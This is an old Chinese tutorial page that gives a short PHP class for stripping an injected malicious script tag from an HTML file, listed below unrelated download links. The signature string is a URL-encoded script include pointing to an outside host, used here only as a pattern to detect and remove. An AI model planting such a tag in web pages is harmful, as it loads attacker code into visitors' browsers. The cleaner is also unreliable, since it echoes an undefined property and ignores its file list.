- 1. phpMyAdmin(支持对数据库进行建立、复制,删除数据等...
- 2. QuickPHP V1.12.1(php脚本调试工具) 绿色免费版
- 3. phpMyAdmin(支持对数据库进行完全操控) V3.4.2.0 F...
- 4. phpMyAdmin(通过互联网控制操作MYSQL的软件) V3.4....
- 5. phpMyAdmin 3.4.0 RC2 多语绿色版_很方便的网络远M...
- 6. 基于PHP和MySql的个人文章发布/管理平台Swan v1.0.0
- 7. 强大的PHP在线购物系统Avactis购物车系统 V2.1
- 8. 教你如何更好地与上司沟通这样和上司说话 PDF电子书
- 9. 不懂会计/计算机也能轻松运用零天房屋出租管理系统...
- 10. 免费解密php程序的黑刀Dezender 5.0 简体中文版
教你如何运用PHP清除网页病毒
作者: 来源: 发布时间:2011-5-25 15:32:48 点击:
本文章给大家分享的是关于利用PHP清除网页病毒的方法,好像是进行一些替换操作,大家可以测试,希望对大家有所帮助。
<?php
Class clear_virus{
public $index ='b.html';
public $filepath =array('b.html');
public $virus_type ="<script src=http://%61%76%65%33%2E%63%6E></script>";
function open_file(){
if(file_exists($this->index)){
$tmp =file_get_contents($this->index);
if( strrpos($tmp,$this->virus_type)!== false){
$temp =str_replace($this->virus_type,'',$tmp);
$handle =fopen($this->index,'w');
fwrite($handle,$temp);
fclose($handle);
}else{
echo $this->virus_find;
}
}
}
}
$virus =new clear_virus;
$virus->open_file();
?>
清除script 病毒
-
资料引用:http://www.knowsky.com/442657.html
上一篇:PHP中autoload的实现方式 下一篇: 运用PHP做一个全能搜索引擎
[收藏此文章]